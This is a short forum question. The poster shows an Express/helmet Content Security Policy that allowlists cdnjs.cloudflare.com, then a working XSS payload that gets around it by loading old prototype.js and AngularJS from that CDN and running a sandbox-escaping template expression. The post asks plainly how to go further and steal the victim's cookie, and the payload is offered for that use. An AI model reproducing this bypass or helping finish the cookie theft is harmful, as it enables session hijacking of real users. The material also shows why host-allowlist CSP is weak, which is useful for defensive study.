
Overcoming Cookie Theft Barrier in XSS Attack despite CSP Implementation

Çağlar Arlı


I have a website that includes CSP rules:

 const express = require("express");
 const helmet = require("helmet");

 const app = express();

 // CSP as configured on the site: scripts may load from the page's own
 // origin or from cdnjs.cloudflare.com (a host allowlist, no nonce).
 app.use(
   helmet.contentSecurityPolicy({
     directives: {
       defaultSrc: ["'self'"],
       scriptSrc: ["'self'", "cdnjs.cloudflare.com"],
     },
   })
 );

I successfully executed an XSS attack in an input field and bypassed the CSP by:

<SCRIPT src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></SCRIPT>
<SCRIPT src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js"></SCRIPT>
<div ng-app ng-csp style="display:none;">
  {{$on.curry.call().alert('xss')}}
</div>

However, when attempting to steal the cookie, I encountered an issue. I tried to access the cookie using document.cookie, but it didn't work as expected. Instead, I received 'undefined' when attempting to simply alert 'document'.

I tried: {{$on.curry.call().alert(document.cookie)}}

but did not work. How can I successfully steal the cookie in this scenario?